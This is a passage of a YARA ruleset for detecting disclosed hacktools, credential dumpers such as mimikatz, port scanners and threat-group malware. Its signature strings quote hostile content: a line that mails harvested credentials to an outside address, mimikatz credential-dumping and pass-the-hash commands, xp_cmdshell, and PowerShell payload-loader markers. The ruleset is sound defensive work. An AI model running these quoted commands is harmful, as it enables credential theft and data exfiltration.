= "Findrst6" fullword ascii $s4 = "Press Any Key To Continue......" fullword ascii condition: all of them } rule sig_238_rshsvc { meta: description = "Disclosed hacktool set (old stuff) - file rshsvc.bat" author = "Florian Roth" date = "23.11.14" score = 60 hash = "fb15c31254a21412aecff6a6c4c19304eb5e7d75" strings: $s0 = "if not exist %1\\rshsetup.exe goto ERROR2" fullword ascii $s1 = "ECHO rshsetup.exe is not found in the %1 directory" fullword ascii $s9 = "REM %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dll" fullword ascii $s10 = "copy %1\\rshsvc.exe" fullword ascii $s12 = "ECHO Use \"net start rshsvc\" to start the service." fullword ascii $s13 = "rshsetup %SystemRoot%\\system32\\rshsvc.exe %SystemRoot%\\system32\\rshsvc.dll" fullword ascii $s18 = "pushd %SystemRoot%\\system32" fullword ascii condition: all of them } rule gina_zip_Folder_gina { meta: description = "Disclosed hacktool set (old stuff) - file gina.dll" author = "Florian Roth" date = "23.11.14" score = 60 hash = "e0429e1b59989cbab6646ba905ac312710f5ed30" strings: $s0 = "NEWGINA.dll" fullword ascii $s1 = "LOADER ERROR" fullword ascii $s3 = "WlxActivateUserShell" fullword ascii $s6 = "WlxWkstaLockedSAS" fullword ascii $s13 = "WlxIsLockOk" fullword ascii $s14 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii $s16 = "WlxShutdown" fullword ascii $s17 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii condition: all of them } rule superscan3_0 { meta: description = "Disclosed hacktool set (old stuff) - file superscan3.0.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "a9a02a14ea4e78af30b8b4a7e1c6ed500a36bc4d" strings: $s0 = "\\scanner.ini" fullword ascii $s1 = "\\scanner.exe" fullword ascii $s2 = "\\scanner.lst" fullword ascii $s4 = "\\hensss.lst" fullword ascii $s5 = "STUB32.EXE" fullword wide $s6 = "STUB.EXE" fullword wide $s8 = "\\ws2check.exe" fullword ascii $s9 = "\\trojans.lst" 
fullword ascii $s10 = "1996 InstallShield Software Corporation" fullword wide condition: all of them } rule sig_238_xsniff { meta: description = "Disclosed hacktool set (old stuff) - file xsniff.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "d61d7329ac74f66245a92c4505a327c85875c577" strings: $s2 = "xsiff.exe -pass -hide -log pass.log" fullword ascii $s3 = "%s - simple sniffer for win2000" fullword ascii $s4 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii $s5 = "HOST: %s USER: %s, PASS: %s" fullword ascii $s7 = "http://www.xfocus.org" fullword ascii $s9 = " -pass : Filter username/password" fullword ascii $s18 = " -udp : Output udp packets" fullword ascii $s19 = "Code by glacier <glacier@xfocus.org>" fullword ascii $s20 = " -tcp : Output tcp packets" fullword ascii condition: 6 of them } rule sig_238_fscan { meta: description = "Disclosed hacktool set (old stuff) - file fscan.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "d5646e86b5257f9c83ea23eca3d86de336224e55" strings: $s0 = "FScan v1.12 - Command line port scanner." fullword ascii $s2 = " -n - no port scanning - only pinging (unless you use -q)" fullword ascii $s5 = "Example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200" fullword ascii $s6 = " -z - maximum simultaneous threads to use for scanning" fullword ascii $s12 = "Failed to open the IP list file \"%s\"" fullword ascii $s13 = "http://www.foundstone.com" fullword ascii $s16 = " -p - TCP port(s) to scan (a comma separated list of ports/ranges) " fullword ascii $s18 = "Bind port number out of range. Using system default." 
fullword ascii $s19 = "fscan.exe" fullword wide condition: 4 of them } rule _iissample_nesscan_twwwscan { meta: description = "Disclosed hacktool set (old stuff) - from files iissample.exe, nesscan.exe, twwwscan.exe" author = "Florian Roth" date = "23.11.14" score = 60 super_rule = 1 hash0 = "7f20962bbc6890bf48ee81de85d7d76a8464b862" hash1 = "c0b1a2196e82eea4ca8b8c25c57ec88e4478c25b" hash2 = "548f0d71ef6ffcc00c0b44367ec4b3bb0671d92f" strings: $s0 = "Connecting HTTP Port - Result: " fullword $s1 = "No space for command line argument vector" fullword $s3 = "Microsoft(July/1999~) http://www.microsoft.com/technet/security/current.asp" fullword $s5 = "No space for copy of command line" fullword $s7 = "- Windows NT,2000 Patch Method - " fullword $s8 = "scanf : floating point formats not linked" fullword $s12 = "hrdir_b.c: LoadLibrary != mmdll borlndmm failed" fullword $s13 = "!\"what?\"" fullword $s14 = "%s Port %d Closed" fullword $s16 = "printf : floating point formats not linked" fullword $s17 = "xxtype.cpp" fullword condition: all of them } rule _FsHttp_FsPop_FsSniffer { meta: description = "Disclosed hacktool set (old stuff) - from files FsHttp.exe, FsPop.exe, FsSniffer.exe" author = "Florian Roth" date = "23.11.14" score = 60 super_rule = 1 hash0 = "9d4e7611a328eb430a8bb6dc7832440713926f5f" hash1 = "ae23522a3529d3313dd883727c341331a1fb1ab9" hash2 = "7ffc496cd4a1017485dfb571329523a52c9032d8" strings: $s0 = "-ERR Invalid Command, Type [Help] For Command List" fullword $s1 = "-ERR Get SMS Users ID Failed" fullword $s2 = "Control Time Out 90 Secs, Connection Closed" fullword $s3 = "-ERR Post SMS Failed" fullword $s4 = "Current.hlt" fullword $s6 = "Histroy.hlt" fullword $s7 = "-ERR Send SMS Failed" fullword $s12 = "-ERR Change Password <New Password>" fullword $s17 = "+OK Send SMS Succussifully" fullword $s18 = "+OK Set New Password: [%s]" fullword $s19 = "CHANGE PASSWORD" fullword condition: all of them } rule Ammyy_Admin_AA_v3 { meta: description = "Remote Admin Tool 
used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe" author = "Florian Roth" reference = "http://goo.gl/gkAg2E" date = "2014/12/22" score = 55 hash1 = "b130611c92788337c4f6bb9e9454ff06eb409166" hash2 = "07539abb2623fe24b9a05e240f675fa2d15268cb" strings: $x1 = "S:\\Ammyy\\sources\\target\\TrService.cpp" fullword ascii $x2 = "S:\\Ammyy\\sources\\target\\TrDesktopCopyRect.cpp" fullword ascii $x3 = "Global\\Ammyy.Target.IncomePort" fullword ascii $x4 = "S:\\Ammyy\\sources\\target\\TrFmFileSys.cpp" fullword ascii $x5 = "Please enter password for accessing remote computer" fullword ascii $s1 = "CreateProcess1()#3 %d error=%d" fullword ascii $s2 = "CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name." fullword ascii $s3 = "ERROR: CreateProcessAsUser() error=%d, session=%d" fullword ascii $s4 = "ERROR: FindProcessByName('explorer.exe')" fullword ascii condition: 2 of ($x*) or all of ($s*) } /* Other dumper and custom hack tools */ rule LinuxHacktool_eyes_screen { meta: description = "Linux hack tools - file screen" author = "Florian Roth" reference = "not set" date = "2015/01/19" hash = "a240a0118739e72ff89cefa2540bf0d7da8f8a6c" strings: $s0 = "or: %s -r [host.tty]" fullword ascii $s1 = "%s: process: character, ^x, or (octal) \\032 expected." fullword ascii $s2 = "Type \"screen [-d] -r [pid.]tty.host\" to resume one of them." 
fullword ascii $s6 = "%s: at [identifier][%%|*|#] command [args]" fullword ascii $s8 = "Slurped only %d characters (of %d) into buffer - try again" fullword ascii $s11 = "command from %s: %s %s" fullword ascii $s16 = "[ Passwords don't match - your armor crumbles away ]" fullword ascii $s19 = "[ Passwords don't match - checking turned off ]" fullword ascii condition: all of them } rule LinuxHacktool_eyes_scanssh { meta: description = "Linux hack tools - file scanssh" author = "Florian Roth" reference = "not set" date = "2015/01/19" hash = "467398a6994e2c1a66a3d39859cde41f090623ad" strings: $s0 = "Connection closed by remote host" fullword ascii $s1 = "Writing packet : error on socket (or connection closed): %s" fullword ascii $s2 = "Remote connection closed by signal SIG%s %s" fullword ascii $s4 = "Reading private key %s failed (bad passphrase ?)" fullword ascii $s5 = "Server closed connection" fullword ascii $s6 = "%s: line %d: list delimiter not followed by keyword" fullword ascii $s8 = "checking for version `%s' in file %s required by file %s" fullword ascii $s9 = "Remote host closed connection" fullword ascii $s10 = "%s: line %d: bad command `%s'" fullword ascii $s13 = "verifying that server is a known host : file %s not found" fullword ascii $s14 = "%s: line %d: expected service, found `%s'" fullword ascii $s15 = "%s: line %d: list delimiter not followed by domain" fullword ascii $s17 = "Public key from server (%s) doesn't match user preference (%s)" fullword ascii condition: all of them } rule LinuxHacktool_eyes_pscan2 { meta: description = "Linux hack tools - file pscan2" author = "Florian Roth" reference = "not set" date = "2015/01/19" hash = "56b476cba702a4423a2d805a412cae8ef4330905" strings: $s0 = "# pscan completed in %u seconds. (found %d ips)" fullword ascii $s1 = "Usage: %s <b-block> <port> [c-block]" fullword ascii $s3 = "%s.%d.* (total: %d) (%.1f%% done)" fullword ascii $s8 = "Invalid IP." 
fullword ascii $s9 = "# scanning: " fullword ascii $s10 = "Unable to allocate socket." fullword ascii condition: 2 of them } rule LinuxHacktool_eyes_a { meta: description = "Linux hack tools - file a" author = "Florian Roth" reference = "not set" date = "2015/01/19" hash = "458ada1e37b90569b0b36afebba5ade337ea8695" strings: $s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii $s1 = "mv scan.log bios.txt" fullword ascii $s2 = "rm -rf bios.txt" fullword ascii $s3 = "echo -e \"# by Eyes.\"" fullword ascii $s4 = "././pscan2 $1 22" fullword ascii $s10 = "echo \"#cautam...\"" fullword ascii condition: 2 of them } rule LinuxHacktool_eyes_mass { meta: description = "Linux hack tools - file mass" author = "Florian Roth" reference = "not set" date = "2015/01/19" hash = "2054cb427daaca9e267b252307dad03830475f15" strings: $s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii $s1 = "echo -e \"${BLU}Private Scanner By Raphaello , DeMMoNN , tzepelush & DraC\\n\\r" ascii $s3 = "killall -9 pscan2" fullword ascii $s5 = "echo \"[*] ${DCYN}Gata esti h4x0r ;-)${RES} [*]\"" fullword ascii $s6 = "echo -e \"${DCYN}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${RES}\"" fullword ascii condition: 1 of them } rule LinuxHacktool_eyes_pscan2_2 { meta: description = "Linux hack tools - file pscan2.c" author = "Florian Roth" reference = "not set" date = "2015/01/19" hash = "eb024dfb441471af7520215807c34d105efa5fd8" strings: $s0 = "snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);" fullword ascii $s2 = "printf(\"Usage: %s <b-block> <port> [c-block]\\n\", argv[0]);" fullword ascii $s3 = "printf(\"\\n# pscan completed in %u seconds. 
(found %d ips)\\n\", (time(0) - sca" ascii $s19 = "connlist[i].addr.sin_family = AF_INET;" fullword ascii $s20 = "snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\"," fullword ascii condition: 2 of them } rule CN_Portscan : APT { meta: description = "CN Port Scanner" author = "Florian Roth" release_date = "2013-11-29" confidential = false score = 70 strings: $s1 = "MZ" $s2 = "TCP 12.12.12.12" condition: ($s1 at 0) and $s2 } rule WMI_vbs : APT { meta: description = "WMI Tool - APT" author = "Florian Roth" release_date = "2013-11-29" confidential = false score = 70 strings: $s3 = "WScript.Echo \" $$\\ $$\\ $$\\ $$\\ $$$$$$\\ $$$$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$$$$$" condition: all of them } rule CN_Toolset__XScanLib_XScanLib_XScanLib { meta: description = "Detects a Chinese hacktool from a disclosed toolset - from files XScanLib.dll, XScanLib.dll, XScanLib.dll" author = "Florian Roth" reference = "http://qiannao.com/ls/905300366/33834c0c/" reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar" date = "2015/03/30" score = 70 super_rule = 1 hash0 = "af419603ac28257134e39683419966ab3d600ed2" hash1 = "c5cb4f75cf241f5a9aea324783193433a42a13b0" hash2 = "135f6a28e958c8f6a275d8677cfa7cb502c8a822" strings: $s1 = "Plug-in thread causes an exception, failed to alert user." fullword $s2 = "PlugGetUdpPort" fullword $s3 = "XScanLib.dll" fullword $s4 = "PlugGetTcpPort" fullword $s11 = "PlugGetVulnNum" fullword condition: all of them } rule CN_Toolset_NTscan_PipeCmd { meta: description = "Detects a Chinese hacktool from a disclosed toolset - file PipeCmd.exe" author = "Florian Roth" reference = "http://qiannao.com/ls/905300366/33834c0c/" reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar" date = "2015/03/30" score = 70 hash = "a931d65de66e1468fe2362f7f2e0ee546f225c4e" strings: $s2 = "Please Use NTCmd.exe Run This Program." 
fullword ascii $s3 = "PipeCmd.exe" fullword wide $s4 = "\\\\.\\pipe\\%s%s%d" fullword ascii $s5 = "%s\\pipe\\%s%s%d" fullword ascii $s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii $s7 = "%s\\ADMIN$\\System32\\%s" fullword ascii $s9 = "PipeCmdSrv.exe" fullword ascii $s10 = "This is a service executable! Couldn't start directly." fullword ascii $s13 = "\\\\.\\pipe\\PipeCmd_communicaton" fullword ascii $s14 = "PIPECMDSRV" fullword wide $s15 = "PipeCmd Service" fullword ascii condition: 4 of them } rule CN_Toolset_LScanPortss_2 { meta: description = "Detects a Chinese hacktool from a disclosed toolset - file LScanPortss.exe" author = "Florian Roth" reference = "http://qiannao.com/ls/905300366/33834c0c/" reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar" date = "2015/03/30" score = 70 hash = "4631ec57756466072d83d49fbc14105e230631a0" strings: $s1 = "LScanPort.EXE" fullword wide $s3 = "www.honker8.com" fullword wide $s4 = "DefaultPort.lst" fullword ascii $s5 = "Scan over.Used %dms!" fullword ascii $s6 = "www.hf110.com" fullword wide $s15 = "LScanPort Microsoft " fullword wide $s18 = "L-ScanPort2.0 CooFly" fullword wide condition: 4 of them } rule CN_Toolset_sig_1433_135_sqlr { meta: description = "Detects a Chinese hacktool from a disclosed toolset - file sqlr.exe" author = "Florian Roth" reference = "http://qiannao.com/ls/905300366/33834c0c/" reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar" date = "2015/03/30" score = 70 hash = "8542c7fb8291b02db54d2dc58cd608e612bfdc57" strings: $s0 = "Connect to %s MSSQL server success. Type Command at Prompt." 
fullword ascii $s11 = ";DATABASE=master" fullword ascii $s12 = "xp_cmdshell '" fullword ascii $s14 = "SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver" ascii condition: all of them } /* Mimikatz */ rule Mimikatz_Memory_Rule_1 : APT { meta: author = "Florian Roth" date = "12/22/2014" score = 70 type = "memory" description = "Detects password dumper mimikatz in memory" strings: $s1 = "sekurlsa::msv" fullword ascii $s2 = "sekurlsa::wdigest" fullword ascii $s4 = "sekurlsa::kerberos" fullword ascii $s5 = "sekurlsa::tspkg" fullword ascii $s6 = "sekurlsa::livessp" fullword ascii $s7 = "sekurlsa::ssp" fullword ascii $s8 = "sekurlsa::logonPasswords" fullword ascii $s9 = "sekurlsa::process" fullword ascii $s10 = "ekurlsa::minidump" fullword ascii $s11 = "sekurlsa::pth" fullword ascii $s12 = "sekurlsa::tickets" fullword ascii $s13 = "sekurlsa::ekeys" fullword ascii $s14 = "sekurlsa::dpapi" fullword ascii $s15 = "sekurlsa::credman" fullword ascii condition: 1 of them } rule Mimikatz_Memory_Rule_2 : APT { meta: description = "Mimikatz Rule generated from a memory dump" author = "Florian Roth - Florian Roth" type = "memory" score = 80 strings: $s0 = "sekurlsa::" ascii $x1 = "cryptprimitives.pdb" ascii $x2 = "Now is t1O" ascii fullword $x4 = "ALICE123" ascii $x5 = "BOBBY456" ascii condition: $s0 and 1 of ($x*) } rule mimikatz { meta: description = "mimikatz" author = "Benjamin DELPY (gentilkiwi)" tool_author = "Benjamin DELPY (gentilkiwi)" score = 80 strings: $exe_x86_1 = { 89 71 04 89 [0-3] 30 8d 04 bd } $exe_x86_2 = { 89 79 04 89 [0-3] 38 8d 04 b5 } $exe_x64_1 = { 4c 03 d8 49 [0-3] 8b 03 48 89 } $exe_x64_2 = { 4c 8b df 49 [0-3] c1 e3 04 48 [0-3] 8b cb 4c 03 [0-3] d8 } $dll_1 = { c7 0? 00 00 01 00 [4-14] c7 0? 01 00 00 00 } $dll_2 = { c7 0? 10 02 00 00 ?? 89 4? 
} $sys_x86 = { a0 00 00 00 24 02 00 00 40 00 00 00 [0-4] b8 00 00 00 6c 02 00 00 40 00 00 00 } $sys_x64 = { 88 01 00 00 3c 04 00 00 40 00 00 00 [0-4] e8 02 00 00 f8 02 00 00 40 00 00 00 } condition: (all of ($exe_x86_*)) or (all of ($exe_x64_*)) or (all of ($dll_*)) or (any of ($sys_*)) } rule mimikatz_lsass_mdmp { meta: description = "LSASS minidump file for mimikatz" author = "Benjamin DELPY (gentilkiwi)" strings: $lsass = "System32\\lsass.exe" wide nocase condition: (uint32(0) == 0x504d444d) and $lsass } rule wce { meta: description = "wce" author = "Benjamin DELPY (gentilkiwi)" tool_author = "Hernan Ochoa (hernano)" strings: $hex_legacy = { 8b ff 55 8b ec 6a 00 ff 75 0c ff 75 08 e8 [0-3] 5d c2 08 00 } $hex_x86 = { 8d 45 f0 50 8d 45 f8 50 8d 45 e8 50 6a 00 8d 45 fc 50 [0-8] 50 72 69 6d 61 72 79 00 } $hex_x64 = { ff f3 48 83 ec 30 48 8b d9 48 8d 15 [0-16] 50 72 69 6d 61 72 79 00 } condition: any of them } rule lsadump { meta: description = "LSA dump programe (bootkey/syskey) - pwdump and others" author = "Benjamin DELPY (gentilkiwi)" strings: $str_sam_inc = "\\Domains\\Account" ascii nocase $str_sam_exc = "\\Domains\\Account\\Users\\Names\\" ascii nocase $hex_api_call = {(41 b8 | 68) 00 00 00 02 [0-64] (68 | ba) ff 07 0f 00 } $str_msv_lsa = { 4c 53 41 53 52 56 2e 44 4c 4c 00 [0-32] 6d 73 76 31 5f 30 2e 64 6c 6c 00 } $hex_bkey = { 4b 53 53 4d [20-70] 05 00 01 00} condition: ( ($str_sam_inc and not $str_sam_exc) or $hex_api_call or $str_msv_lsa or $hex_bkey ) and not uint16(0) == 0x5a4d } rule Mimikatz_Logfile { meta: description = "Detects a log file generated by malicious hack tool mimikatz" author = "Florian Roth" score = 80 date = "2015/03/31" reference = "https://github.com/Neo23x0/Loki/blob/master/signatures/thor-hacktools.yar" strings: $s1 = "SID :" ascii fullword $s2 = "* NTLM :" ascii fullword $s3 = "Authentication Id :" ascii fullword $s4 = "wdigest :" ascii fullword condition: all of them } rule AppInitHook { meta: description = 
"AppInitGlobalHooks-Mimikatz - Hide Mimikatz From Process Lists - file AppInitHook.dll" author = "Florian Roth" reference = "https://goo.gl/Z292v6" date = "2015-07-15" score = 70 hash = "e7563e4f2a7e5f04a3486db4cefffba173349911a3c6abd7ae616d3bf08cfd45" strings: $s0 = "\\Release\\AppInitHook.pdb" ascii $s1 = "AppInitHook.dll" fullword ascii $s2 = "mimikatz.exe" fullword wide $s3 = "]X86Instruction->OperandSize >= Operand->Length" fullword wide $s4 = "mhook\\disasm-lib\\disasm.c" fullword wide $s5 = "mhook\\disasm-lib\\disasm_x86.c" fullword wide $s6 = "VoidFunc" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 500KB and 4 of them } rule VSSown_VBS { meta: description = "Detects VSSown.vbs script - used to export shadow copy elements like NTDS to take away and crack elsewhere" author = "Florian Roth" date = "2015-10-01" score = 75 strings: $s0 = "Select * from Win32_Service Where Name ='VSS'" ascii $s1 = "Select * From Win32_ShadowCopy" ascii $s2 = "cmd /C mklink /D " ascii $s3 = "ClientAccessible" ascii $s4 = "WScript.Shell" ascii $s5 = "Win32_Process" ascii condition: all of them } rule wineggdrop : portscanner toolkit { meta: author = "Christian Rebischke (@sh1bumi)" date = "2015-09-05" description = "Rules for TCP Portscanner VX.X by WinEggDrop" in_the_wild = true family = "Hackingtool/Portscanner" strings: $a = { 54 43 50 20 50 6f 72 74 20 53 63 61 6e 6e 65 72 20 56 3? 2e 3? 20 42 79 20 57 69 6e 45 67 67 44 72 6f 70 0a } $b = "Result.txt" $c = "Usage: %s TCP/SYN StartIP [EndIP] Ports [Threads] [/T(N)] [/(H)Banner] [/Save]\n" condition: //check for MZ Signature at offset 0 uint16(0) == 0x5A4D and //check for wineggdrop specific strings $a and $b and $c } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/

/*
    Yara Rule Set
    Author: Florian Roth
    Date: 2016-01-15
    Identifier: Exe2hex
*/

rule Payload_Exe2Hex : toolkit
{
    meta:
        description = "Detects payload generated by exe2hex"
        author = "Florian Roth"
        reference = "https://github.com/g0tmi1k/exe2hex"
        date = "2016-01-15"
        score = 70
    strings:
        // Four encodings of the same markers; $b*/$d* are URL-encoded variants of
        // $a*/$c* (%2F = "/", %22 = "\"", %3D = "=", %3E = ">", "+" for space).
        $a1 = "set /p \"=4d5a" ascii
        $a2 = "powershell -Command \"$hex=" ascii
        $b1 = "set+%2Fp+%22%3D4d5" ascii
        $b2 = "powershell+-Command+%22%24hex" ascii
        $c1 = "echo 4d 5a " ascii
        $c2 = "echo r cx >>" ascii
        $d1 = "echo+4d+5a+" ascii
        $d2 = "echo+r+cx+%3E%3E" ascii
    condition:
        // Both strings of any one encoding group must match.
        all of ($a*) or all of ($b*) or all of ($c*) or all of ($d*)
}

import "pe"

rule DeltaCharlie
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    strings:
        // Single hard-coded byte blob; "any of them" below is equivalent to $rsaKey alone.
        $rsaKey = {7B 4E 1E A7 E9 3F 36 4C DE F4 F0 99 C4 D9 B7 94 A1 FF F2 97 D3 91 13 9D C0 12 02 E4 4C BB 6C 77 48 EE 6F 4B 73 D7 1A 44 13 B3 6A BB 61 44 AF 31 47 E7 87 C2 AE 7A A7 2C 3A D9 5C 2E 42 1A A6 78 FE 2C AD ED 39 3F FA D0 AD 3D D9 C5 3F 58 A0 19 27 CC 27 C9 E8 D8 1E 7E EE 91 DD 13 B3 47 EF 57 1A CA FF 9A 60 E0 64 08 AA E2 92 D0}
    condition:
        any of them
}

import "pe"

rule HotelAlfa
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "58dab205ecb1e0972027eb92f68cec6d208e5ab5.ex_"
    strings:
        $resourceHTML = "RSRC_HTML"
        /*
        8A 0C 18                mov cl, [eax+ebx]
        80 F1 63                xor cl, 63h
        88 0C 18                mov [eax+ebx], cl
        8B 4D 00                mov ecx, [ebp+0]
        40                      inc eax
        3B C1                   cmp eax, ecx
        72 EF                   jb short loc_4010B4
        */
        // Byte-XOR decode loop; the key byte (63h above) and the register operands are wildcarded.
        $rscsDecoderLoop = {8A [2] 80 F1 ?? 88 [2] 8B [2] 40 3B ?? 72 EF}
    condition:
        // The loop must fall inside the .text section's raw data; if the file has no .text
        // section, pe.section_index() is undefined and the `in` term evaluates false.
        $resourceHTML and $rscsDecoderLoop in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule IndiaAlfa_One
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    strings:
        $ = "HwpFilePathCheck.dll"
        $ = "AdobeArm.exe"
        $ = "OpenDocument"
    condition:
        // Any two of the three anonymous strings.
        2 of them
}

rule IndiaAlfa_Two
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    strings:
        $ = "ExePath: %s\nXlsPath: %s\nTmpPath: %s\n"
    condition:
        any of them
}

import "pe"

rule IndiaBravo_PapaAlfa
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    strings:
        // "pmsconfig.msi" (wide) is also one of the PapaAlfa strings further down this file.
        $ = "pmsconfig.msi" wide
        $ = "scvrit001.bat"
    condition:
        all of them
}

rule IndiaBravo_RomeoCharlie
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "58ad28ac4fb911abb6a20382456c4ad6fe5c8ee5.ex_"
        Status = "Signature is too loose to be useful."
    strings:
        /*
        50                      push eax                ; argp
        68 7E 66 04 80          push 8004667Eh          ; cmd
        8B 8D DC FE FF FF       mov ecx, [ebp+skt]
        51                      push ecx                ; s
        FF 15 58 31 41 00       call ioctlsocket
        83 F8 FF                cmp eax, 0FFFFFFFFh
        75 08                   jnz short loc_4043F0
        */
        $a = {50 68 7E 66 04 80 8B 8D [4] 51 FF 15 [4] 83 F8 FF 75}
        $b1 = "xc123465-efff-87cc-37abcdef9"
        $b2 = "[Check] - PORT ERROR..."
wide
        // The same format string is also used by the PapaAlfa rule further down this file.
        $b3 = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d"
    condition:
        // See the `Status` meta above: the authors consider this signature too loose.
        2 of ($b*) or $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule IndiaBravo_RomeoBravo
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "6e3db4da27f12eaba005217eba7cd9133bc258c97fe44605d12e20a556775009"
    strings:
        /*
        E8 C3 FE FF FF          call generate64ByteRandomNumber
        68 C8 01 00 00          push 1C8h               ; dwLength
        68 D8 E8 40 00          push offset g_Config    ; pvBuffer
        A3 80 EA 40 00          mov dword ptr g_Config.qwIdentifier, eax
        89 15 84 EA 40 00       mov dword ptr g_Config.qwIdentifier+4, edx
        E8 F9 E9 FF FF          call DNSCALCDecode
        83 C4 08                add esp, 8
        8D 4C 24 08             lea ecx, [esp+214h+var_20C]
        6A 00                   push 0
        51                      push ecx
        68 C8 01 00 00          push 1C8h
        68 D8 E8 40 00          push offset g_Config
        56                      push esi
        FF 15 74 E7 40 00       call WriteFile_9
        56                      push esi
        FF 15 6C E7 40 00       call CloseHandle_9
        */
        // Call targets and addresses are wildcarded; only the low word of the two 1C8h
        // pushes is left open ([2] 00 00) and the register pushes are matched as 5?.
        $a = {E8 [4] 68 [2] 00 00 68 [4] A3 [4] 89 15 [4] E8 [4] 83 C4 08 8D [3] 6A 00 5? 68 [2] 00 00 68 [4] 5? FF 15 [4] 5? FF 15}
        $b1 = "tmscompg.msi" wide
        $b2 = "cvrit000.bat"
    condition:
        // Either both filenames, or the code sequence located inside the .text raw data.
        2 of ($b*) or $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule IndiaBravo_generic
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    strings:
        $extractDll = "[2] - Extract Dll..." wide
        $createSvc = "[3] - CreateSVC..." wide
    condition:
        all of them
}

rule IndiaCharlie_One
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    strings:
        $ = "WMPNetworkSvcUpdate"
        $ = "backSched.dll"
        // "\mspaint.exe" is also $s4 in IndiaCharlie_Two below.
        $ = "\\mspaint.exe"
        $aesKey = "X,LLIe{))%%l2i<[AM|aq!Ql/lPlw]d7@C-#j.<c|#*}Kx4_H(q^F-F^p/[t#%HT"
    condition:
        // "2 of them" counts $aesKey as well as the anonymous strings; $aesKey alone also suffices.
        2 of them or $aesKey
}

rule IndiaCharlie_Two
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    strings:
        $s1 = "%s is an essential element in Windows System configuration and management. %s"
        $s2 = "%SYSTEMROOT%\\system32\\svchost.exe -k " 
        $s3 = "%s\\system32\\%s"
        $s4 = "\\mspaint.exe"
        // The same self-deleting batch script literal is $suicideScript in IndiaJuliett_1.
        $s5 = ":R\nIF NOT EXIST %s GOTO E\ndel /a %s\nGOTO R\n:E\ndel /a d.bat"
        $aesKey = "}[eLkQAeEae0t@h18g!)3x-RvE%+^`n.6^()?+00ME6a&F7vcV}`@.dj]&u$o*vX"
    condition:
        3 of ($s*) or $aesKey
}

import "pe"

rule IndiaDelta
{
    meta:
        copyright = "2015 Novetta Solutions"
        author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
        Source = "d7b50b1546653bff68220996190446bdc7fc4e38373715b8848d1fb44fe3f53c"
    strings:
        /*
        FF 15 DC 2D 41 00       call ReadFile_0
        8B 44 24 20             mov eax, [esp+25Ch+offsetInFile]
        8B 54 24 1C             mov edx, [esp+25Ch+dwEmbedCnt]
        35 78 56 34 12          xor eax, 12345678h
        55                      push ebp
        55                      push ebp
        81 F2 78 56 34 12       xor edx, 12345678h
        50                      push eax
        57                      push edi
        89 54 24 2C             mov [esp+26Ch+dwEmbedCnt], edx
        89 44 24 30             mov [esp+26Ch+offsetInFile], eax
        FF 15 E0 2D 41 00       call SetFilePointer_0
        */
        // The two 12345678h XOR immediates are kept literal; the surrounding moves/pushes
        // are covered by the [4-12], [0-2] and [0-10] jumps.
        $a = {FF 15 [4-12] 3? 78 56 34 12 [0-2] 8? ??
78 56 34 12 [0-10] FF 15}
    condition:
        // Matches only inside the .text section's raw data; a missing .text section
        // leaves the range undefined and the term evaluates false.
        $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

import "pe"

rule IndiaEcho
{
